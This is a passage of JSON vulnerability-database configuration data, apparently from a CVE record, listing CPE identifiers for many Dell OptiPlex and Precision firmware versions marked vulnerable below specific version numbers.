"cpe:2.3:o:dell:optiplex_5260_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5260_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5270_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5270_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5400_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.38", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5400_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5480_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5480_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_5490_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_5490_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7000_micro_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7000_micro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7000_small_form_factor_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7000_small_form_factor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7000_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7000_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7000_xe_micro_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7000_xe_micro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7060_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7060:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7070_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7070:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7070_ultra_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7070_ultra:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7071_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7071:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7080_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7080:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7090_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7090_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7090_ultra_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7090_ultra:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7400_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.1.38", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7400_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7450_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7450_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7460_all_in_one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7460_all_in_one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7470_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7470_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7480_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7480_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7490_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7490_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7760_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7760_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7770_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7770_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_7780_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_7780_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_all-in-one_7410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_all-in-one_7410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_micro_7010_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_micro_7010:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_micro_plus_7010_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_micro_plus_7010:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_small_form_factor_7010_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_small_form_factor_7010:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_small_form_factor_plus_7010_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_small_form_factor_plus_7010:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_tower_7010_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_tower_7010:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_tower_plus_7010_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_tower_plus_7010:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_xe3_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_xe3:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:optiplex_xe4_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:optiplex_xe4_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3240_compact_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3240_compact:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3260_xe_compact_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3260_xe_compact:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3260_compact_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3260_compact:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3420_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3420_tower:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3460_xe_small_form_factor_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3460_xe_small_form_factor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3460_small_form_factor_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3460_small_form_factor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3470_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3470:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3480_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3480:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.35.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3541_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3541:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3551_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3551:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3560_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3560:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3561_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3561:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3570_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3570:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3571_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3571:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3580_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3580:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3581_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_3581:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_3620_tower_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.29.0", "cpe_name" : [ ] } ] }, { "operator" : 